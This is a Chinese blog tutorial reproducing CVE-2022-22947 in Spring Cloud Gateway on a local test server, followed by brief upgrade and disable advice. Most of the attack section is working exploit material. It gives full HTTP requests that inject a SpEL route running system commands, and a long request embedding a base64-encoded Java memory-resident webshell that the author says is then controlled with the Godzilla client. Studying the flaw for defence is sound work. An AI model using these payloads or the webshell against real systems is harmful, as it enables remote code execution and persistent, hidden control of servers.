springboot gateway命令执行漏洞复现(CVE-2022-22947)+内存马

最新推荐文章于 2024-06-27 14:30:14 发布
最新推荐文章于 2024-06-27 14:30:14 发布
阅读量616 收藏 11
点赞数 24
分类专栏: 漏洞复现 文章标签: spring boot gateway 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61860998/article/details/139872193
版权

漏洞介绍

使用 Spring Cloud Gateway 的应用如果对外暴露了 Gateway Actuator 接口,则可能存在被 CVE-2022-22947 漏洞利用的风险。攻击者可通过利用此漏洞执行 SpEL 表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。

影响范围

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
其他旧的、不受支持的 Spring Cloud Gateway 版本

漏洞环境搭建

环境:IDEA2024       maven 3.9.8        java JDK8

这里推荐个maven环境配置教程,不再过多赘述Maven超细致史上最全Maven下载安装配置教学(2023更新...全版本)建议收藏...赠送IDEA配置Maven教程-CSDN博客

配置好maven之后  用IDEA新建一个springboot项目,选项如下

然后这里选择springboot版本2.4.2

项目新建后,里面的目录可以参考这样新建

SpringcloudApllication如下

package com.example.springcloud;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class SpringcloudApplication {

    public static void main(String[] args) {
        SpringApplication.run(SpringcloudApplication.class, args);
    }

}

application.yml如下(注意,这里的端口不要和burp的重复)

server:
  port: 8081

management:
  endpoints:
    web:
      exposure:
        include: gateway
  endpoint:
    gateway:
      enabled: true

pom.xml如下

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.5.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>gateway-poc</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>gateway-poc</name>
    <description>gateway-poc</description>
    <properties>
        <java.version>1.8</java.version>
        <spring-cloud.version>2020.0.5</spring-cloud.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-starter-gateway</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-actuator</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.cloud</groupId>
            <artifactId>spring-cloud-starter-gateway</artifactId>
            <version>3.1.0</version>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-actuator</artifactId>
        </dependency>
    </dependencies>
    <dependencyManagement>
        <dependencies>
            <dependency>
                <groupId>org.springframework.cloud</groupId>
                <artifactId>spring-cloud-dependencies</artifactId>
                <version>2020.0.3</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>
        </dependencies>
    </dependencyManagement>

    <build>
        <finalName>gateway</finalName>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                </configuration>
            </plugin>
        </plugins>
    </build>

</project>

全部配置好之后点击右边的M来刷新一下配置,安装依赖

全部安装完成之后直接运行,开始复现漏洞

漏洞复现

命令执行

运行漏洞环境

成功进入页面

用bp抓正常包

然后发送到repeater构造payload添加恶意路由

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 327

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

构造成功直接send

然后进行一个刷新网关路由的操作

POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

响应码200可以看到刷新成功

直接访问刚添加的恶意路由,看看会不会命令执行

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 127.0.0.1:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

可以看到whoami命令执行成功

内存马

接着来升级一下,尝试打入内存马

POST /actuator/gateway/routes/a HTTP/1.1
Host: localhost:8081
sec-ch-ua: &quot;Chromium&quot;;v=&quot;123&quot;, &quot;Not:A-Brand&quot;;v=&quot;8&quot;
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: &quot;Windows&quot;
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 11042

{
"predicates":[{"name": "Path",
"args":{"_genkey_0":"/gmem/**"}
}
],
  "id": "wolaile",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQBeAoADQC2BwC3CgACALYJABIAuAoAAgC5CQASALoKAAIAuwoAEgC8CQASAL0KAA0AvggAcgcAvwcAwAcAwQcAwgoADADDCgAOAMQHAMUIAJ8HAMYHAMcKAA8AyAsAyQDKCgASALYKAA4AywgAzAcAzQoAGwDOCADPBwDQBwDRCgDSANMKANIA1AoAHgDVBwDWCACBBwCECQDXANgKANcA2QgA2goA2wDcBwDdCgAVAN4KACoA3woA2wDgCgDbAOEIAOIKAOMA5AoAFQDlCgDjAOYHAOcKAOMA6AoAMwDpCgAzAOoKABUA6wgA7AoADADtCADuCgAMAO8IAPAIAPEKAAwA8ggA8wgA9AgA9QgA9ggA9wsAFAD4EgAAAP4KAP8BAAcBAQkBAgEDCgBHAQQKABsBBQsBBgEHCgASAQgKABIBCQkAEgEKCAELCwEMAQ0KABIBDgsBDAEPCAEQBwERCgBUALYKAA0BEgoAFQETCgANALsKAFQBFAoAEgEVCgAVARYKAP8BFwcBGAoAXQC2CABlCAEZAQAFc3RvcmUBAA9MamF2YS91dGlsL01hcDsBAAlTaWduYXR1cmUBADVMamF2YS91dGlsL01hcDxMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL09iamVjdDs+OwEABHBhc3MBABJMamF2YS9sYW5nL1N0cmluZzsBAANtZDUBAAJ4YwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAXTGNvbS9leGFtcGxlL0dNZW1TaGVsbDsBAAhkb0luamVjdAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAVcmVnaXN0ZXJIYW5kbGVyTWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA5leGVjdXRlQ29tbWFuZAEAEnJlcXVlc3RNYXBwaW5nSW5mbwEAQ0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAANtc2cBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQADb2JqAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEcGF0aAEADVN0YWNrTWFwVGFibGUHAM0HAMcBABBNZXRob2RQYXJhbWV0ZXJzAQALZGVmaW5lQ2xhc3MBABUoW0IpTGphdmEvbGFuZy9DbGFzczsBAApjbGFzc2J5dGVzAQACW0IBAA51cmxDbGFzc0xvYWRlcgEAGUxqYXZhL25ldC9VUkxDbGFzc0xvYWRlcjsBAAZtZXRob2QBAApFeGNlcHRpb25zAQABeAEAByhbQlopW0IBAAFjAQAVTGphdmF4L2NyeXB0by9DaXBoZXI7AQABcwEAAW0BAAFaBwDFBwEaAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAB1MamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEAA3JldAEADGJhc2U2NEVuY29kZQEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAdFbmNvZGVyAQAGYmFzZTY0AQARTGphdmEvbGFuZy9DbGFzczsBAAJicwEABXZhbHVlAQAMYmFzZTY0RGVjb2RlAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAB2RlY29kZXIBAANjbWQBAF0oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTspTG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9SZXNwb25zZUVudGl0eTsBAAxidWZmZXJTdHJlYW0BAAJleAEABXBkYXRhAQAyTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZlci9TZXJ2ZXJXZWJFeGNoYW5nZTsBABlSdW50aW1lVmlzaWJsZUFubm90YXRpb25zAQA1TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2JpbmQvYW5ub3RhdGlvbi9Qb3N0TWFwcGluZzsBAAQvY21kAQAMbGFtYmRhJGNtZCQwAQBHKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsBAAZhcnJPdXQBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQABZgEAAmlkAQAEZGF0YQEAKExvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcDsBAAZyZXN1bHQBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7BwC3AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOR01lbVNoZWxsLmphdmEMAGkAagEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABlAGYMARsBHAwAaABmDAEdAR4MAGcAkgwAZwBmDAEfASABAA9qYXZhL2xhbmcvQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQBBb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvcmVhY3RpdmUvcmVzdWx0L21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm8MASEBIgwBIwEkAQAVY29tL2V4YW1wbGUvR01lbVNoZWxsAQAwb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmVyL1NlcnZlcldlYkV4Y2hhbmdlAQAQamF2YS9sYW5nL1N0cmluZwwBJQEoBwEpDAEqASsMASwBLQEAAm9rAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwBLgBqAQAFZXJyb3IBABdqYXZhL25ldC9VUkxDbGFzc0xvYWRlcgEADGphdmEvbmV0L1VSTAcBLwwBMAExDAEyATMMAGkBNAEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcBNQwBNgCZDAE3ATgBAANBRVMHARoMATkBOgEAH2phdmF4L2NyeXB0by9zcGVjL1NlY3JldEtleVNwZWMMATsBPAwAaQE9DAE+AT8MAUABQQEAA01ENQcBQgwBOQFDDAFEAUUMAUYBRwEAFGphdmEvbWF0aC9CaWdJbnRlZ2VyDAFIATwMAGkBSQwBHQFKDAFLAR4BABBqYXZhLnV0aWwuQmFzZTY0DAFMAU0BAApnZXRFbmNvZGVyDAFOASIBAA5lbmNvZGVUb1N0cmluZwEAFnN1bi5taXNjLkJBU0U2NEVuY29kZXIMAU8BUAEABmVuY29kZQEACmdldERlY29kZXIBAAZkZWNvZGUBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAFRAVIBABBCb290c3RyYXBNZXRob2RzDwYBUxABVA8HAVUQAKkMAVYBVwcBWAwBWQFaAQAnb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL1Jlc3BvbnNlRW50aXR5BwFbDAFcAV0MAGkBXgwBXwEeBwFgDAFhAVQMAJwAnQwAiQCKDABhAGIBAAdwYXlsb2FkBwFiDAFjAVQMAIEAggwBZAFlAQAKcGFyYW1ldGVycwEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtDAFmAWcMAWgBaQwBagE8DACVAJYMAWgBSgwBawFsAQARamF2YS91dGlsL0hhc2hNYXABABAzYzZlMGI4YTljMTUyMjRhAQATamF2YXgvY3J5cHRvL0NpcGhlcgEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEABXBhdGhzAQAHQnVpbGRlcgEADElubmVyQ2xhc3NlcwEAYChbTGphdmEvbGFuZy9TdHJpbmc7KUxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbyRCdWlsZGVyOwEASW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvJEJ1aWxkZXIBAAVidWlsZAEARSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3JlYWN0aXZlL3Jlc3VsdC9tZXRob2QvUmVxdWVzdE1hcHBpbmdJbmZvOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD3ByaW50U3RhY2tUcmFjZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQApKFtMamF2YS9uZXQvVVJMO0xqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7KVYBABFqYXZhL2xhbmcvSW50ZWdlcgEABFRZUEUBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEAC2dldEluc3RhbmNlAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAhnZXRCeXRlcwEABCgpW0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEABGluaXQBABcoSUxqYXZhL3NlY3VyaXR5L0tleTspVgEAB2RvRmluYWwBAAYoW0IpW0IBABtqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3QBADEoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3NlY3VyaXR5L01lc3NhZ2VEaWdlc3Q7AQAGbGVuZ3RoAQADKClJAQAGdXBkYXRlAQAHKFtCSUkpVgEABmRpZ2VzdAEABihJW0IpVgEAFShJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvVXBwZXJDYXNlAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBAAtuZXdJbnN0YW5jZQEAFCgpTGphdmEvbGFuZy9PYmplY3Q7AQALZ2V0Rm9ybURhdGEBAB8oKUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87CgFtAW4BACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwoAEgFvAQAFYXBwbHkBADYoTGNvbS9leGFtcGxlL0dNZW1TaGVsbDspTGphdmEvdXRpbC9mdW5jdGlvbi9GdW5jdGlvbjsBABtyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm8BAAdmbGF0TWFwAQA8KExqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247KUxyZWFjdG9yL2NvcmUvcHVibGlzaGVyL01vbm87AQAjb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXMBAAJPSwEAJUxvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czsBADooTGphdmEvbGFuZy9PYmplY3Q7TG9yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzOylWAQAKZ2V0TWVzc2FnZQEAJm9yZy9zcHJpbmdmcmFtZXdvcmsvdXRpbC9NdWx0aVZhbHVlTWFwAQAIZ2V0Rmlyc3QBAA1qYXZhL3V0aWwvTWFwAQADZ2V0AQADcHV0AQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAZlcXVhbHMBABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBAAlzdWJzdHJpbmcBABYoSUkpTGphdmEvbGFuZy9TdHJpbmc7AQALdG9CeXRlQXJyYXkBAARqdXN0AQAxKExqYXZhL2xhbmcvT2JqZWN0OylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwcBcAwBcQF0DACoAKkBACJqYXZhL2xhbmcvaW52b2tlL0xhbWJkYU1ldGFmYWN0b3J5AQALbWV0YWZhY3RvcnkHAXYBAAZMb29rdXABAMwoTGphdmEvbGFuZy9pbnZva2UvTWV0aG9kSGFuZGxlcyRMb29rdXA7TGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RUeXBlOylMamF2YS9sYW5nL2ludm9rZS9DYWxsU2l0ZTsHAXcBACVqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwAQAeamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGVzACEAEgANAAAABAAJAGEAYgABAGMAAAACAGQACQBlAGYAAAAJAGcAZgAAAAkAaABmAAAACgABAGkAagABAGsAAAAvAAEAAQAAAAUqtwABsQAAAAIAbAAAAAYAAQAAABMAbQAAAAwAAQAA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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/gmem')}"
    }
  }],
  "uri": "http://test.com"
}

直接发送上面构造好的payload,创建成功

然后就是和刚刚上面的操作一样,刷新一遍网关路由

再次访问可以看到这里已经打进去了

然后用哥斯拉进行连接

连接成功,直接命令执行

结束

漏洞修复建议

3.1.x 版本用户应升级到 3.1.1+ 版本,3.0.x 版本用户应升级到 3.0.7+ 版本。
或者在不考虑影响业务的情况下禁用 Gateway actuator 接口:如application.properties 中配置 management.endpoint.gateway.enabled 为 false。

J0Y学安全
关注
  • 24
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 1602
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
SpringCloudGateway远程代码执行CVE-2022-22947
m0_57379855的博客
03-12 1480
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
yggcwhat
06-29 2736
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
m0_67400973的博客
08-24 454
Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。切换到/vulhub/spring/CVE-2022-22947目录。
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
白帽子九一
03-15 1445
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947) 遵纪守法 任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益 漏洞描述: Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问ActuatorAPI的情况下,将可以利用该漏洞执行任意命令漏洞影响: 3.1.0、 3.0
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 7336
